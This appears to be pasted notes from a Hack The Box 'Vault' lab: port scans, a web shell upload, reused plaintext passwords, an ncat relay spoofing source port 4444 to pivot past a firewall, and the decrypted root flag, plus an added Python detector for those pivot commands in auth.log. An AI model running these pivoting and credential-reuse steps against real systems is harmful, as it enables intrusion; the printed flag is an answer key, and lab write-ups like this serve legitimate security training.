Untitled

a guest
Nov 18th, 2018
root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:52 MDT
Nmap scan report for 10.10.10.109
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
| 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 193.74 ms 10.10.14.1
2 105.66 ms 10.10.10.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.83 seconds


root@kali:~/HTB/boxes/Vault# nmap -sU 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 15:12 MDT
Nmap scan report for 10.10.10.109
Host is up (0.14s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
389/udp open|filtered ldap
631/udp open|filtered ipp
5353/udp open|filtered zeroconf

Nmap done: 1 IP address (1 host up) scanned in 1083.23 seconds


root@kali:~/HTB/boxes/Vault# nmap --script=/usr/share/nmap/scripts/ssh2-enum-algos.nse 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:57 MDT
Nmap scan report for 10.10.10.109
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh2-enum-algos:
| kex_algorithms: (6)
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group14-sha1
| server_host_key_algorithms: (5)
| ssh-rsa
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov 3 15:05:13 2018
URL_BASE: http://10.10.10.109/sparklays/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.109/sparklays/ ----
+ http://10.10.10.109/sparklays/admin.php (CODE:200|SIZE:615)
==> DIRECTORY: http://10.10.10.109/sparklays/design/

---- Entering directory: http://10.10.10.109/sparklays/design/ ----
==> DIRECTORY: http://10.10.10.109/sparklays/design/uploads/

---- Entering directory: http://10.10.10.109/sparklays/design/uploads/ ----

-----------------
END_TIME: Sat Nov 3 15:36:08 2018
DOWNLOADED: 13836 - FOUND: 1

LOGIN PAGE
http://10.10.10.109/sparklays/admin.php

UPLOAD FILES
http://10.10.10.109/sparklays/design/changelogo.php

UPLOADED P0WNY@SHELL TO GAIN A WEB BROWSER SHELL AND FOUND THE SSH PASSWORD IN DAVE'S DESKTOP FOLDER
ssh dave@10.10.10.109
Dav3therav3123

FOUND A FILE ENTITLED KEY THAT CONTAINS
itscominghome

ACCESS THE WEBSITE FROM THE SERVER
ssh -D 8080 dave@10.10.10.109

==============================================================================================================
REWORK THIS AREA
==============================================================================================================
MORE CREDENTIALS FOUND
root@DNS: var www DNS desktop# cat ssh
dave
dav3gerous567

SSH INTO THE DNS SERVER
ssh dave@192.168.122.4
dav3gerous567

READ ALEX'S .BASH_HISTORY AND LOOKED AT THE VISUDO FILE, WHICH LETS ADMINS SUDO AS ROOT

BECOME ROOT
sudo su -
dav3gerous567

TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 0.82 ms 192.168.5.1

Nmap scan report for Vault (192.168.5.2)
Host is up (0.0021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
53/tcp closed domain
4444/tcp closed krb524
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 0.98 ms 192.168.122.5
2 1.86 ms Vault (192.168.5.2)

HOW TO +++++====================================================================================================
SEE WHAT PORTS ARE OPEN ON VAULT
cat /var/log/auth.log | grep -a 192.168.5.2
(port 4444 is used for ssh)

SET UP A LISTENER
ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &

ENSURE THE PORT IS OPEN
/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

SSH IN
ssh dave@localhost -p 5555

IS THE PORT BEING USED BY SOMEONE ELSE?
ps aux | grep ncat
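A defender's counterpart to the HOW TO above, added here and not part of the original notes: the relay and source-port trick leaves its commands in the sudo entries of auth.log (the same file the notes grep), so a few patterns over the COMMAND field catch it. The sudo lines below are constructed samples that copy the commands from this page, not output from the box; the ssh -D/-L/-R pattern is a generalization beyond what the notes show.

```python
import re

# Constructed auth.log sample (not captured from the box): two sudo entries repeat the
# nmap source-port probe and the ncat relay from the notes above, two lines are benign.
SAMPLE_AUTH_LOG = """\
Nov  3 15:40:01 DNS sshd[1201]: Accepted password for dave from 192.168.122.1 port 51312 ssh2
Nov  3 15:41:10 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/apt update
Nov  3 15:42:37 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Nov  3 15:43:02 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 5555 --sh-exec ncat 192.168.5.2 987 --source-port=4444
"""

# Standard sudo log line: "<ts> <host> sudo: <user> : TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# (regex over the command, reason). Kept narrow so that e.g. "ssh -p 22" is not flagged.
INDICATORS = [
    (re.compile(r"\b(nmap|ncat|nc|hping3)\b.*--source-port[= ]\d+"), "fixed source port (firewall rule evasion)"),
    (re.compile(r"\bncat\b.*--(sh-)?exec\b"), "ncat relay via --exec/--sh-exec"),
    (re.compile(r"\bncat\b.*\s-l\b"), "ncat listener"),
    (re.compile(r"\bssh\b.*\s-[DLR]\s*\d"), "ssh port forwarding / SOCKS pivot"),
]

def parse_sudo(line):
    """Return the fields of a sudo log line as a dict, or None for any other line."""
    m = SUDO_RE.match(line)
    return m.groupdict() if m else None

def detect_pivot_commands(log_text):
    """Scan auth.log text and return one finding per sudo command matching an indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_sudo(line)
        if not rec:
            continue
        reasons = [reason for rx, reason in INDICATORS if rx.search(rec["cmd"])]
        if reasons:
            findings.append({"ts": rec["ts"], "user": rec["user"], "runas": rec["runas"],
                             "cmd": rec["cmd"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in detect_pivot_commands(SAMPLE_AUTH_LOG):
        print(f"{f['ts']} {f['user']} as {f['runas']}: {f['cmd']}\n    -> {', '.join(f['reasons'])}")
```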

dave@vault:~$ ls
root.txt.gpg

SCP IT BACK TO THE UBUNTU MACHINE; ENSURE NCAT IS WORKING
root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
[1] 14627

COPY THE FILE FROM VAULT TO DNS USING SCP FROM DNS
root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
dave@localhost's password:
root.txt.gpg 100% 629 0.6KB/s 00:00
[1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
root@DNS:~# cd /tmp
root@DNS:/tmp# ls
root.txt.gpg test.txt

COPY THE FILE FROM DNS TO UBUNTU, FROM THE UBUNTU MACHINE
dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
dave@192.168.122.4's password:
root.txt.gpg 100% 629 0.6KB/s 00:00
dave@ubuntu:~$ cd /dev/shm

DECRYPT THE GPG ROOT FILE USING THE KEY FOUND IN DAVE'S DESKTOP FOLDER
dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
"david <dave@david.com>"
itscominghome

ROOT FILE
ca468370b91d1f5906e31093d9bfe819